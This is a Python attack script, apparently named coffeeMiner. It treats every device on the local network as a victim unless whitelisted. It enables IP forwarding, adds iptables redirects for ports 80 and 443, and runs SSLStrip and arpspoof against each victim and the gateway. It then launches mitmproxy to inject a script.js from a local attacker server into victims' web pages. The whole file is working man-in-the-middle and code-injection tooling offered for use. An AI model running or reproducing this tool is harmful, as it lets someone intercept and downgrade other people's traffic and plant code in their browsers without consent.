coffeeMiner/coffeeMiner.py

import subprocess, re, os, sys

def get_victims():
    whitelist = 'whitelist.txt'
    victims = []
    ip_str = subprocess.check_output(['arp','-a']) # use arp -a to get connected devices
    ip_list = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", ip_str) # use regex to turn the output into a list
    
    if not os.path.isfile(whitelist):
        victims = ip_list
        print("No %s! Continuing...") % whitelist
    else:
        for ip in ip_list:
            if not ip in open('whitelist.txt').read():
                #add ip to victim's list if it's not in whitelist.txt
                victims.append(ip)
            else:
                print("Skipping whitelisted ip %s") % ip
        
    return victims
    
#get gateway_ip (router)
gateway = sys.argv[1]
print("gateway: " + gateway)
# get victims_ip
victims = get_victims()
print("victims: ")
for v in victims:
    print(v)

# configure routing (IPTABLES)
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
os.system("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE")
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080")
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080")

# run SSLStrip on port 8080
os.system("python /sslstrip/sslstrip.py -l 8080")

# run the arpspoof for each victim, each one in a new console
for victim in victims:
    os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &")
    os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")

# start the http server for serving the script.js, in a new console
os.system("xterm -hold -e 'python3 httpServer.py' &")

# start the mitmproxy
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' -T")


'''
# run sslstrip
os.system("xterm -e sslstrip -l 8080 &")
'''